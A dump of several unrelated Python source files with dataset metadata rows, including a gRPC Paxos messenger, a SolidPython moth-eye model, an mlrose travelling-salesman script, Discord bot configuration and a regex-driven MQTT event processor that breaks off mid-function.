from protobufs import paxos_pb2
TIMEOUT_SECONDS = 10
def ignore(future):
result = future.result()
return
def ignore_accept(future):
result = future.result()
return
def ignore_promise(future):
result = future.result()
return
def ignore_learn(future):
result = future.result()
return
def ignore_refuse(future):
result = future.result()
return
class grpcMessenger(Messenger):
def __init__(self, name):
Messenger.__init__(self)
self.name = name
self.destinations = {}
return
def _fetch_stub(self, name):
# fetch the stub for the proposer
try:
stub = self.destinations[name]
except KeyError:
print "_fetch_stub: could not find stub for {}".format(name)
return None
except:
print "_fetch_stub: unknown error"
return None
return stub
def get_quorum(self):
return self.destinations.keys()
def add_destination(self, name, host, port):
# uses gRPC to create a channel and a stub
channel = implementations.insecure_channel(host, port)
stub = paxos_pb2.beta_create_VM_stub(channel)
# simply change the entry; do not check if it already exists
self.destinations[name] = stub
# function always succeeds
return True
def send_prepare(self, p, n, quorum):
for acceptor in quorum:
# fetch the stub for each of the acceptors
stub = self._fetch_stub(acceptor)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.PrepareRequest(proposal_number = p,
decree_number = n, proposer = self.name)
# finally send message to this acceptor
response = stub.handle_prepare.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore)
return True
def send_accept(self, p, n, v, quorum):
for acceptor in quorum:
# fetch the stub for each of the acceptors
stub = self._fetch_stub(acceptor)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.AcceptRequest(proposal_number = p,
decree_number = n, value = v, proposer = self.name)
# finally send message to this acceptor
response = stub.handle_accept.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore_accept)
return True
def send_promise(self, had_previous, p, proposer, n, v, dest):
# fetch the stub for the proposer
stub = self._fetch_stub(dest)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.PromiseRequest(had_previous = had_previous, proposal_number = p,
proposer = proposer, decree_number = n, value = v, acceptor = self.name)
# finally send promise back to proposer
response = stub.handle_promise.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore_promise)
return True
def send_refuse(self, p, proposer, n, dest):
# fetch the stub for the proposer
stub = self._fetch_stub(dest)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.RefuseRequest(proposal_number = p,
proposer = proposer, decree_number = n, acceptor = self.name)
# finally send refusal back to proposer
response = stub.handle_refuse.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore_refuse)
return True
def send_learn(self, p, proposer, n, v, learner):
# fetch the stub for the learner
stub = self._fetch_stub(learner)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.LearnRequest(proposal_number = p, proposer = proposer,
decree_number = n, value = v, acceptor = self.name)
# finally send message to learner
response = stub.handle_learn.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore_learn)
return True
| en | 0.755061 | This module provides an implementation of the Messenger class using Google's RPC Protocol (gRPC). For the specific documentation of the arguments these methods take and what they do at a high level, refer to messenger.py. # fetch the stub for the proposer # uses gRPC to create a channel and a stub # simply change the entry; do not check if it already exists # function always succeeds # fetch the stub for each of the acceptors # create the appropriate request # finally send message to this acceptor # fetch the stub for each of the acceptors # create the appropriate request # finally send message to this acceptor # fetch the stub for the proposer # create the appropriate request # finally send promise back to proposer # fetch the stub for the proposer # create the appropriate request # finally send refusal back to proposer # fetch the stub for the learner # create the appropriate request # finally send message to learner | 2.82703 | 3 |
ch20/ListComprehensionsandFunctionalTools.py | eroicaleo/LearningPython | 1 | 6616758 | #!/usr/local/bin/python3.3
res = map(ord, 'spam')
print(list(res))
res = [ord(x) for x in 'spam']
print(res)
print([x ** 2 for x in range(10)])
print(list(map(lambda x: x ** 2, range(10))))
print([x for x in range(5) if x % 2 == 0])
print(list(filter(lambda x: x % 2 == 0, range(5))))
print([x ** 2 for x in range(10) if x % 2 == 0])
print(list(map(lambda x: x ** 2, filter(lambda x: x % 2 == 0, range(10)))))
print([x+y for x in [0, 1, 2] for y in [100, 200, 300]])
print([x+y for x in 'spam' for y in 'SPAM'])
print([(x, y) for x in range(5) if x % 2 == 0 for y in range(5) if y % 2 == 1])
M = [[y+x for y in range(3)] for x in [1, 4, 7]]
print(M)
N = [[x] * 3 for x in [1, 2, 3]]
print(N)
| #!/usr/local/bin/python3.3
res = map(ord, 'spam')
print(list(res))
res = [ord(x) for x in 'spam']
print(res)
print([x ** 2 for x in range(10)])
print(list(map(lambda x: x ** 2, range(10))))
print([x for x in range(5) if x % 2 == 0])
print(list(filter(lambda x: x % 2 == 0, range(5))))
print([x ** 2 for x in range(10) if x % 2 == 0])
print(list(map(lambda x: x ** 2, filter(lambda x: x % 2 == 0, range(10)))))
print([x+y for x in [0, 1, 2] for y in [100, 200, 300]])
print([x+y for x in 'spam' for y in 'SPAM'])
print([(x, y) for x in range(5) if x % 2 == 0 for y in range(5) if y % 2 == 1])
M = [[y+x for y in range(3)] for x in [1, 4, 7]]
print(M)
N = [[x] * 3 for x in [1, 2, 3]]
print(N)
| en | 0.645071 | #!/usr/local/bin/python3.3 | 3.3796 | 3 |
moth-goggles.py | AbstractGeek/moth-goggles | 0 | 6616759 | #!/usr/bin/env python
import solid
import solid.utils as sutil
import numpy as np
# Output file settings
filename = "moth-goggles.scad"
SEGMENTS = 20
# Model settings
outer_sphere_radius = 35 # mm
inner_sphere_radius = 20 # mm
ommatidum_angle = 5 # deg
ommatidum_radius = np.tan(ommatidum_angle * np.pi / 180) * outer_sphere_radius
thickness = 0.25
def sph2cart(radius, azimuth, elevation):
"""Convert spherical coordinates to cartesian coordinates."""
x = radius * np.cos(elevation * np.pi / 180) * \
np.cos(azimuth * np.pi / 180)
y = radius * np.cos(elevation * np.pi / 180) * \
np.sin(azimuth * np.pi / 180)
z = radius * np.sin(elevation * np.pi / 180)
return x, y, z
def create_ommatidum(outer_sphere_radius,
inner_sphere_radius, ommatidum_radius):
"""Create an hexagonal based pyramid."""
# Outer shell
outer_shell = [tuple(np.round(sph2cart(ommatidum_radius, az, 0), 2))
for az in np.arange(0, 359, 60)]
outer_points = [[0, 0, 0]] + [[outer_sphere_radius, x, y]
for x, y, _ in outer_shell]
# Inner shell
inner_shell = [tuple(np.round(
sph2cart(ommatidum_radius - thickness, az, 0), 2))
for az in np.arange(0, 359, 60)]
inner_points = [[0, 0, 0]] + [[outer_sphere_radius, x, y]
for x, y, _ in inner_shell]
# Define Faces
faces = [
[0, 1, 2],
[0, 2, 3],
[0, 3, 4],
[0, 4, 5],
[0, 5, 6],
[0, 6, 1],
[1, 2, 3, 4, 5, 6]]
# Create ommatidum
ommatidum = solid.difference()(
solid.hull()(solid.polyhedron(outer_points, faces)),
solid.hull()(solid.polyhedron(inner_points, faces)),
solid.sphere(inner_sphere_radius)
)
return ommatidum
def create_moth_eye(ommatidum, ommatidum_radius, sphere_radius):
"""Create moth eye using ommatidia."""
# Elevation angle correction
el_step = np.arctan2(
ommatidum_radius * np.cos(30.0 * np.pi / 180.0),
sphere_radius) * 180 / np.pi
elevation = np.arange(-45, 45, 2 * (el_step))
moth_eye = solid.union()
for el in elevation:
curr_radius = sphere_radius * np.cos(el * np.pi / 180)
az_step = np.arctan2(ommatidum_radius, curr_radius) * 180 / np.pi
azimuth = np.arange(0, 180, 2 * az_step)
for az in azimuth:
moth_eye.add(solid.rotate([0, el, az])(ommatidum))
return moth_eye
ommatidum = create_ommatidum(outer_sphere_radius,
inner_sphere_radius, ommatidum_radius)
moth_eye = create_moth_eye(ommatidum, ommatidum_radius, outer_sphere_radius)
solid.scad_render_to_file(moth_eye, filename,
file_header='$fn = %s;' % SEGMENTS)
| #!/usr/bin/env python
import solid
import solid.utils as sutil
import numpy as np
# Output file settings
filename = "moth-goggles.scad"
SEGMENTS = 20
# Model settings
outer_sphere_radius = 35 # mm
inner_sphere_radius = 20 # mm
ommatidum_angle = 5 # deg
ommatidum_radius = np.tan(ommatidum_angle * np.pi / 180) * outer_sphere_radius
thickness = 0.25
def sph2cart(radius, azimuth, elevation):
"""Convert spherical coordinates to cartesian coordinates."""
x = radius * np.cos(elevation * np.pi / 180) * \
np.cos(azimuth * np.pi / 180)
y = radius * np.cos(elevation * np.pi / 180) * \
np.sin(azimuth * np.pi / 180)
z = radius * np.sin(elevation * np.pi / 180)
return x, y, z
def create_ommatidum(outer_sphere_radius,
inner_sphere_radius, ommatidum_radius):
"""Create an hexagonal based pyramid."""
# Outer shell
outer_shell = [tuple(np.round(sph2cart(ommatidum_radius, az, 0), 2))
for az in np.arange(0, 359, 60)]
outer_points = [[0, 0, 0]] + [[outer_sphere_radius, x, y]
for x, y, _ in outer_shell]
# Inner shell
inner_shell = [tuple(np.round(
sph2cart(ommatidum_radius - thickness, az, 0), 2))
for az in np.arange(0, 359, 60)]
inner_points = [[0, 0, 0]] + [[outer_sphere_radius, x, y]
for x, y, _ in inner_shell]
# Define Faces
faces = [
[0, 1, 2],
[0, 2, 3],
[0, 3, 4],
[0, 4, 5],
[0, 5, 6],
[0, 6, 1],
[1, 2, 3, 4, 5, 6]]
# Create ommatidum
ommatidum = solid.difference()(
solid.hull()(solid.polyhedron(outer_points, faces)),
solid.hull()(solid.polyhedron(inner_points, faces)),
solid.sphere(inner_sphere_radius)
)
return ommatidum
def create_moth_eye(ommatidum, ommatidum_radius, sphere_radius):
"""Create moth eye using ommatidia."""
# Elevation angle correction
el_step = np.arctan2(
ommatidum_radius * np.cos(30.0 * np.pi / 180.0),
sphere_radius) * 180 / np.pi
elevation = np.arange(-45, 45, 2 * (el_step))
moth_eye = solid.union()
for el in elevation:
curr_radius = sphere_radius * np.cos(el * np.pi / 180)
az_step = np.arctan2(ommatidum_radius, curr_radius) * 180 / np.pi
azimuth = np.arange(0, 180, 2 * az_step)
for az in azimuth:
moth_eye.add(solid.rotate([0, el, az])(ommatidum))
return moth_eye
ommatidum = create_ommatidum(outer_sphere_radius,
inner_sphere_radius, ommatidum_radius)
moth_eye = create_moth_eye(ommatidum, ommatidum_radius, outer_sphere_radius)
solid.scad_render_to_file(moth_eye, filename,
file_header='$fn = %s;' % SEGMENTS)
| en | 0.560488 | #!/usr/bin/env python # Output file settings # Model settings # mm # mm # deg Convert spherical coordinates to cartesian coordinates. Create an hexagonal based pyramid. # Outer shell # Inner shell # Define Faces # Create ommatidum Create moth eye using ommatidia. # Elevation angle correction | 2.743034 | 3 |
bio_embeddings/utilities/filemanagers/__init__.py | kvetab/bio_embeddings | 219 | 6616760 | <filename>bio_embeddings/utilities/filemanagers/__init__.py
from bio_embeddings.utilities.filemanagers.FileSystemFileManager import FileSystemFileManager
from bio_embeddings.utilities.filemanagers.FileManagerInterface import FileManagerInterface
def get_file_manager(**kwargs):
# A useless call to pacify the linters
# TODO: when new FileManagers are available, parse the file manager type from "management".
kwargs.get('management', {})
return FileSystemFileManager()
| <filename>bio_embeddings/utilities/filemanagers/__init__.py
from bio_embeddings.utilities.filemanagers.FileSystemFileManager import FileSystemFileManager
from bio_embeddings.utilities.filemanagers.FileManagerInterface import FileManagerInterface
def get_file_manager(**kwargs):
# A useless call to pacify the linters
# TODO: when new FileManagers are available, parse the file manager type from "management".
kwargs.get('management', {})
return FileSystemFileManager()
| en | 0.543521 | # A useless call to pacify the linters # TODO: when new FileManagers are available, parse the file manager type from "management". | 1.768004 | 2 |
codes/python-scripts/print_rodrigues_R.py | karolmajek/observation_equations | 6 | 6616761 | <reponame>karolmajek/observation_equations
from sympy import *
from rodrigues_R_utils import *
T_x, T_y, T_z = symbols('T_x T_y T_z')
s_x, s_y, s_z = symbols('s_x s_y s_z')
RT_wc = matrix44FromRodrigues(T_x, T_y, T_z, s_x, s_y, s_z)
print(RT_wc)
print(latex(RT_wc))
| from sympy import *
from rodrigues_R_utils import *
T_x, T_y, T_z = symbols('T_x T_y T_z')
s_x, s_y, s_z = symbols('s_x s_y s_z')
RT_wc = matrix44FromRodrigues(T_x, T_y, T_z, s_x, s_y, s_z)
print(RT_wc)
print(latex(RT_wc)) | none | 1 | 2.520545 | 3 | |
mlrose.py | svaningelgem/traveling_salesman_leuven | 0 | 6616762 | from itertools import combinations
import mlrose_hiive as mlrose
from common import check_time, coordinates, distance, write_gps_file
# Create list of distances between pairs of cities
dist_list = [
(x, y, distance(coordinates[x], coordinates[y]))
for x, y in combinations(range(len(coordinates)), r=2)
]
def main():
# Source: https://mlrose.readthedocs.io/en/stable/source/tutorial2.html#solving-tsps-with-mlrose
fitness_dists = mlrose.TravellingSales(distances=dist_list)
problem_fit = mlrose.TSPOpt(length=len(coordinates), fitness_fn=fitness_dists, maximize=False)
best_state, best_fitness, _ = mlrose.genetic_alg(problem_fit, max_iters=20)
print("Best length after optimization: ", best_fitness)
write_gps_file(coordinates[best_state, :], 'Leuven')
if __name__ == '__main__':
with check_time():
main()
| from itertools import combinations
import mlrose_hiive as mlrose
from common import check_time, coordinates, distance, write_gps_file
# Create list of distances between pairs of cities
dist_list = [
(x, y, distance(coordinates[x], coordinates[y]))
for x, y in combinations(range(len(coordinates)), r=2)
]
def main():
# Source: https://mlrose.readthedocs.io/en/stable/source/tutorial2.html#solving-tsps-with-mlrose
fitness_dists = mlrose.TravellingSales(distances=dist_list)
problem_fit = mlrose.TSPOpt(length=len(coordinates), fitness_fn=fitness_dists, maximize=False)
best_state, best_fitness, _ = mlrose.genetic_alg(problem_fit, max_iters=20)
print("Best length after optimization: ", best_fitness)
write_gps_file(coordinates[best_state, :], 'Leuven')
if __name__ == '__main__':
with check_time():
main()
| en | 0.843429 | # Create list of distances between pairs of cities # Source: https://mlrose.readthedocs.io/en/stable/source/tutorial2.html#solving-tsps-with-mlrose | 3.185742 | 3 |
bot/cfg/bbData.py | GOF2BountyBot/GOF2BountyBot | 1 | 6616763 | <gh_stars>1-10
from discord import Colour
# all factions recognised by BB
factions = ["terran", "vossk", "midorian", "nivelian", "neutral"]
# all factions useable in bounties
bountyFactions = ["terran", "vossk", "midorian", "nivelian"]
# levels of security in SolarSystems (SolarSystem security is stored as an index in this list)
securityLevels = ["secure", "average", "risky", "dangerous"]
# map image URLS for cmd_map
mapImageWithGraphLink = "https://cdn.discordapp.com/attachments/700683544103747594/700683693215318076/gof2_coords.png"
mapImageNoGraphLink = 'https://i.imgur.com/TmPgPd3.png'
# icons for factions
factionIcons = {"terran": "https://cdn.discordapp.com/attachments/700683544103747594/711013574331596850/terran.png",
"vossk": "https://cdn.discordapp.com/attachments/700683544103747594/711013681621893130/vossk.png",
"midorian": "https://cdn.discordapp.com/attachments/700683544103747594/711013601019691038/midorian.png",
"nivelian": "https://cdn.discordapp.com/attachments/700683544103747594/711013623257890857/nivelian.png",
"neutral":
"https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/rocket_1f680.png",
"void": "https://cdn.discordapp.com/attachments/700683544103747594/711013699841687602/void.png"}
errorIcon = "https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/exclamation-mark_2757.png"
winIcon = "https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/trophy_1f3c6.png"
rocketIcon = "https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/rocket_1f680.png"
# colours to use in faction-related embed strips
factionColours = { "terran": Colour.gold(),
"vossk": Colour.dark_green(),
"midorian": Colour.dark_red(),
"nivelian": Colour.dark_blue(),
"neutral": Colour.purple()}
# Data representing all ship items in the game. These are used to create bbShip objects,
# which are stored in builtInShipObjs in a similar dict format.
# Ships to not have tech levels in GOF2, so tech levels will be automaticaly generated
# for the sake of the bot during bot.on_ready.
builtInShipData = {}
# Data representing all module items in the game. These are used to create bbModule objects,
# which are stored in builtInModuleObjs in a similar dict format.
builtInModuleData = {}
# Data representing all primary weapon items in the game. These are used to create bbWeapon objects,
# which are stored in builtInWeaponObjs in a similar dict format.
builtInWeaponData = {}
# Data representing all ship upgrades in the game. These are used to create bbShipUpgrade objects,
# which are stored in builtInUpgradeObjs in a similar dict format.
builtInUpgradeData = {}
# data for builtIn criminals to be used in Criminal.fromDict
# criminals marked as not builtIn to allow for dictionary init.
# The criminal object is then marked as builtIn during bot.on_ready
builtInCriminalData = {}
# data for builtIn systems to be used in SolarSystem.fromDict
builtInSystemData = {}
# data for builtIn Turrets to be used in bbTurret.fromDict
builtInTurretData = {}
# data for builtIn commodities to be used in bbCommodity.fromDict (unimplemented)
builtInCommodityData = {}
builtInToolData = {}
# data for builtIn secondaries to be used in bbSecondary.fromDict (unimplemented)
builtInSecondariesData = {}
# data for builtIn ShipSkins to be used in ShipSkin.fromDict
builtInShipSkinsData = {}
# Objects representing all ship skins in the game.
builtInShipSkins = {}
builtInToolObjs = {}
# To be populated during bot.on_ready
# These dicts contain item name: item object for the object described in the variable name.
# This is primarily for use in their relevent fromDict functions.
builtInSystemObjs = {}
builtInCriminalObjs = {}
builtInModuleObjs = {}
builtInWeaponObjs = {}
builtInUpgradeObjs = {}
builtInTurretObjs = {}
# References to the above item objects, sorted by techLevel.
shipKeysByTL = []
moduleObjsByTL = []
weaponObjsByTL = []
turretObjsByTL = []
# names of criminals in builtIn bounties
bountyNames = {}
# the length of the longest criminal name, to be used in padding during cmd_bounties
longestBountyNameLength = 0
| from discord import Colour
# all factions recognised by BB
factions = ["terran", "vossk", "midorian", "nivelian", "neutral"]
# all factions useable in bounties
bountyFactions = ["terran", "vossk", "midorian", "nivelian"]
# levels of security in SolarSystems (SolarSystem security is stored as an index in this list)
securityLevels = ["secure", "average", "risky", "dangerous"]
# map image URLS for cmd_map
mapImageWithGraphLink = "https://cdn.discordapp.com/attachments/700683544103747594/700683693215318076/gof2_coords.png"
mapImageNoGraphLink = 'https://i.imgur.com/TmPgPd3.png'
# icons for factions
factionIcons = {"terran": "https://cdn.discordapp.com/attachments/700683544103747594/711013574331596850/terran.png",
"vossk": "https://cdn.discordapp.com/attachments/700683544103747594/711013681621893130/vossk.png",
"midorian": "https://cdn.discordapp.com/attachments/700683544103747594/711013601019691038/midorian.png",
"nivelian": "https://cdn.discordapp.com/attachments/700683544103747594/711013623257890857/nivelian.png",
"neutral":
"https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/rocket_1f680.png",
"void": "https://cdn.discordapp.com/attachments/700683544103747594/711013699841687602/void.png"}
errorIcon = "https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/exclamation-mark_2757.png"
winIcon = "https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/trophy_1f3c6.png"
rocketIcon = "https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/rocket_1f680.png"
# colours to use in faction-related embed strips
factionColours = { "terran": Colour.gold(),
"vossk": Colour.dark_green(),
"midorian": Colour.dark_red(),
"nivelian": Colour.dark_blue(),
"neutral": Colour.purple()}
# Data representing all ship items in the game. These are used to create bbShip objects,
# which are stored in builtInShipObjs in a similar dict format.
# Ships to not have tech levels in GOF2, so tech levels will be automaticaly generated
# for the sake of the bot during bot.on_ready.
builtInShipData = {}
# Data representing all module items in the game. These are used to create bbModule objects,
# which are stored in builtInModuleObjs in a similar dict format.
builtInModuleData = {}
# Data representing all primary weapon items in the game. These are used to create bbWeapon objects,
# which are stored in builtInWeaponObjs in a similar dict format.
builtInWeaponData = {}
# Data representing all ship upgrades in the game. These are used to create bbShipUpgrade objects,
# which are stored in builtInUpgradeObjs in a similar dict format.
builtInUpgradeData = {}
# data for builtIn criminals to be used in Criminal.fromDict
# criminals marked as not builtIn to allow for dictionary init.
# The criminal object is then marked as builtIn during bot.on_ready
builtInCriminalData = {}
# data for builtIn systems to be used in SolarSystem.fromDict
builtInSystemData = {}
# data for builtIn Turrets to be used in bbTurret.fromDict
builtInTurretData = {}
# data for builtIn commodities to be used in bbCommodity.fromDict (unimplemented)
builtInCommodityData = {}
builtInToolData = {}
# data for builtIn secondaries to be used in bbSecondary.fromDict (unimplemented)
builtInSecondariesData = {}
# data for builtIn ShipSkins to be used in ShipSkin.fromDict
builtInShipSkinsData = {}
# Objects representing all ship skins in the game.
builtInShipSkins = {}
builtInToolObjs = {}
# To be populated during bot.on_ready
# These dicts contain item name: item object for the object described in the variable name.
# This is primarily for use in their relevent fromDict functions.
builtInSystemObjs = {}
builtInCriminalObjs = {}
builtInModuleObjs = {}
builtInWeaponObjs = {}
builtInUpgradeObjs = {}
builtInTurretObjs = {}
# References to the above item objects, sorted by techLevel.
shipKeysByTL = []
moduleObjsByTL = []
weaponObjsByTL = []
turretObjsByTL = []
# names of criminals in builtIn bounties
bountyNames = {}
# the length of the longest criminal name, to be used in padding during cmd_bounties
longestBountyNameLength = 0 | en | 0.914854 | # all factions recognised by BB # all factions useable in bounties # levels of security in SolarSystems (SolarSystem security is stored as an index in this list) # map image URLS for cmd_map # icons for factions # colours to use in faction-related embed strips # Data representing all ship items in the game. These are used to create bbShip objects, # which are stored in builtInShipObjs in a similar dict format. # Ships to not have tech levels in GOF2, so tech levels will be automaticaly generated # for the sake of the bot during bot.on_ready. # Data representing all module items in the game. These are used to create bbModule objects, # which are stored in builtInModuleObjs in a similar dict format. # Data representing all primary weapon items in the game. These are used to create bbWeapon objects, # which are stored in builtInWeaponObjs in a similar dict format. # Data representing all ship upgrades in the game. These are used to create bbShipUpgrade objects, # which are stored in builtInUpgradeObjs in a similar dict format. # data for builtIn criminals to be used in Criminal.fromDict # criminals marked as not builtIn to allow for dictionary init. # The criminal object is then marked as builtIn during bot.on_ready # data for builtIn systems to be used in SolarSystem.fromDict # data for builtIn Turrets to be used in bbTurret.fromDict # data for builtIn commodities to be used in bbCommodity.fromDict (unimplemented) # data for builtIn secondaries to be used in bbSecondary.fromDict (unimplemented) # data for builtIn ShipSkins to be used in ShipSkin.fromDict # Objects representing all ship skins in the game. # To be populated during bot.on_ready # These dicts contain item name: item object for the object described in the variable name. # This is primarily for use in their relevent fromDict functions. # References to the above item objects, sorted by techLevel. # names of criminals in builtIn bounties # the length of the longest criminal name, to be used in padding during cmd_bounties | 1.944692 | 2 |
Chapter 13/ch13_16_7.py | bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE | 0 | 6616764 | lines=["Hello Everyone!\n", "Welcome to File Handling.\n"]
f=open("myfile.txt", "w")
f.writelines(lines)
f.close() | lines=["Hello Everyone!\n", "Welcome to File Handling.\n"]
f=open("myfile.txt", "w")
f.writelines(lines)
f.close() | none | 1 | 2.976976 | 3 | |
Daily_challege/Day3/MaxProfit_StockShellBuy.py | pavi-ninjaac/leetcode | 0 | 6616765 | <filename>Daily_challege/Day3/MaxProfit_StockShellBuy.py
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 7 11:07:42 2021
@author: ELCOT
"""
class Solution:
def maxProfit(self, prices):
buy = 1000000000
profit = 0
for i in prices:
if i<buy:
buy = i
profit_ = i - buy
if profit_>profit:
profit = profit_
return profit
Solution().maxProfit([7,1,5,3,6,4]) | <filename>Daily_challege/Day3/MaxProfit_StockShellBuy.py
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 7 11:07:42 2021
@author: ELCOT
"""
class Solution:
def maxProfit(self, prices):
buy = 1000000000
profit = 0
for i in prices:
if i<buy:
buy = i
profit_ = i - buy
if profit_>profit:
profit = profit_
return profit
Solution().maxProfit([7,1,5,3,6,4]) | en | 0.771052 | # -*- coding: utf-8 -*- Created on Wed Apr 7 11:07:42 2021
@author: ELCOT | 3.678746 | 4 |
src/FileManager.py | rfebbo/SpudScale | 1 | 6616766 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import csv
def readData(fileName):
history = []
with open(fileName, newline='') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
history.append(row)
return history
def writeData(fileName, readout):
with open(fileName, 'a', newline='') as csvfile:
writer = csv.writer(csvfile, 'excel')
writer.writerow(readout)
| #!/usr/bin/python3
# -*- coding: utf-8 -*-
import csv
def readData(fileName):
history = []
with open(fileName, newline='') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
history.append(row)
return history
def writeData(fileName, readout):
with open(fileName, 'a', newline='') as csvfile:
writer = csv.writer(csvfile, 'excel')
writer.writerow(readout)
| en | 0.390086 | #!/usr/bin/python3 # -*- coding: utf-8 -*- | 3.595713 | 4 |
light-cep/core/cep.py | KuaJnio/light-cep | 0 | 6616767 | <gh_stars>0
from time import time, sleep
from re import search
from threading import Thread, Lock
from json import JSONEncoder, load, dump
import logging
class PayloadConsumer(Thread):
def __init__(self, payload, rules_handler, regexs_handler, database_handler):
Thread.__init__(self)
self.payload = payload
self.rules_handler = rules_handler
self.regexs_handler = regexs_handler
self.database_handler = database_handler
def look_for_regexs(self):
try:
result = []
for regex in self.regexs_handler.regexs:
r = search(self.regexs_handler.regexs[regex], self.payload)
if r is not None:
result.append(regex)
return result
except Exception as e:
logging.error('Error in PayloadConsumer.look_for_regexs: ' + str(e))
return result
def run(self):
try:
matches = self.look_for_regexs()
for match in matches:
timestamp = int(time())
self.database_handler.insert_match(timestamp, match)
self.rules_handler.handle_match(match, self.payload)
logging.debug("Got match for regex " + match)
except Exception as e:
logging.error('Error in PayloadConsumer.run: ' + str(e))
class RegexsHandler(object):
def __init__(self):
try:
self.regexs = {}
except Exception as e:
logging.error('Error in RegexsHandler.__init__: ' + str(e))
def add_regex(self, name, value):
try:
self.regexs[name] = value
logging.debug("Added regex " + name + " : " + value)
except Exception as e:
logging.error('Error in RegexsHandler.add_regex: ' + str(e))
def reset(self):
del self.regexs
self.regexs = {}
class Rule(object):
def __init__(self, regexs_yes, regexs_no, window, mode, hold, name, output_topic, mqtt_client):
try:
self.regexs_yes = regexs_yes
self.regexs_no = regexs_no
self.window = window
self.mode = mode
self.hold = hold
self.name = name
self.mqtt_client = mqtt_client
self.output_topic = output_topic
self.callback_template = None
self.pending = False
self.remaining_regexs = list(self.regexs_yes)
self.start_time = None
self.completed = False
self.completed_time = None
self.triggering_payloads = {}
except Exception as e:
logging.error('Error in Rule.__init__: ' + str(e))
def has_regex(self, regex):
try:
if not len(self.remaining_regexs) == 0:
if self.mode == "strict":
if self.remaining_regexs[0] == regex:
return True
else:
return False
else:
if regex in self.remaining_regexs:
return True
else:
return False
else:
return False
except Exception as e:
logging.error('Error in Rule.has_regex: ' + str(e))
return False
def is_completed(self):
return self.completed
def complete(self):
self.completed = True
self.completed_time = time()
def is_finished(self):
res = False
if ((len(self.remaining_regexs) == 0) or (self.mode == "one")):
res = True
return res
def is_expired(self):
return time() - self.start_time > self.window
def is_on_hold(self):
return time() - self.completed_time < self.hold
def del_regex(self, regex):
try:
del self.remaining_regexs[self.remaining_regexs.index(regex)]
except Exception as e:
logging.error('Error in Rule.del_regex: ' + str(e))
def reset_rule(self):
try:
self.pending = False
self.completed = False
self.completed_time = None
self.remaining_regexs = list(self.regexs_yes)
self.triggering_payloads = {}
self.callback_payload = ""
except Exception as e:
logging.error('Error in Rule.reset_rule: ' + str(e))
def start_rule(self):
try:
self.pending = True
self.start_time = time()
logging.debug("Initiated rule " + self.name)
except Exception as e:
logging.error('Error in Rule.start_rule: ' + str(e))
def callback(self):
try:
#TODO support jinja template to format callback payload
self.callback_payload = JSONEncoder().encode(
{
"timestamp": int(time()),
"name": self.name,
"triggering_payload": self.triggering_payloads
}
)
logging.info('Triggered rule \'' + self.name + '\'')
self.mqtt_client.publish(self.output_topic, self.callback_payload)
except Exception as e:
logging.error('Error in Rule.callback: ' + str(e))
class RulesHandler(Thread):
def __init__(self, database_handler):
Thread.__init__(self)
self.rules = []
self.database_handler = database_handler
def add_rule(self, rule):
try:
self.rules.append(rule)
except Exception as e:
logging.error('Error in RulesHandler.add_rule: ' + str(e))
def check_rules(self):
try:
for rule in self.rules:
if rule.pending:
if rule.completed:
if rule.is_on_hold():
pass
else:
trigger = True
for value in rule.regexs_no:
timestamp = int(time()) - rule.regexs_no[value]
if self.database_handler.check_for_value(timestamp, value):
logging.debug("Cancelling rule " + rule.name + " because \'regex_no\' " + value + " was found in the last " + str(rule.regexs_no[value]) + " seconds")
trigger = False
if trigger:
rule.callback()
else:
pass
rule.reset_rule()
else:
if rule.is_finished():
rule.complete()
elif rule.is_expired():
rule.reset_rule()
logging.debug("Reseted rule " + rule.name + " because of expiration")
except Exception as e:
logging.error('Error in RulesHandler.check_rules: ' + str(e))
def handle_match(self, name, payload):
try:
for rule in self.rules:
if rule.pending:
if rule.has_regex(name):
rule.del_regex(name)
rule.triggering_payloads[name] = payload
else:
if rule.has_regex(name):
rule.start_rule()
rule.triggering_payloads[name] = payload
rule.del_regex(name)
except Exception as e:
logging.error('Error in RulesHandler.handle_match: ' + str(e))
def reset(self):
del self.rules
self.rules = []
def run(self):
try:
while True:
self.check_rules()
sleep(0.05)
except Exception as e:
logging.error('Error in RulesHandler.run: ' + str(e))
def create_rules_handler(database_handler):
rules_handler = RulesHandler(database_handler)
rules_handler.daemon = True
rules_handler.start()
return rules_handler
def create_rule(regexs_yes, regexs_no, window, mode, hold, name, output_topic, mqtt_client, rules_handler):
isPresent = False
for rule in rules_handler.rules:
if rule.name == name:
isPresent = True
if not isPresent:
rule = Rule(regexs_yes, regexs_no, window, mode, hold, name, output_topic, mqtt_client)
rules_handler.add_rule(rule)
logging.debug("Added rule " + name)
else:
logging.error('Tried to add rule with name ' + name + ' but a rule with the same name already exists, aborting...')
class ConfigHandler(object):
def __init__(self):
self.file_name = "core/config.json"
self.lock = Lock()
def get_config(self):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data
def has_regex(self, name):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return name in data['regexs']
def add_regex(self, name, regex):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['regexs'][name] = regex
f.seek(0)
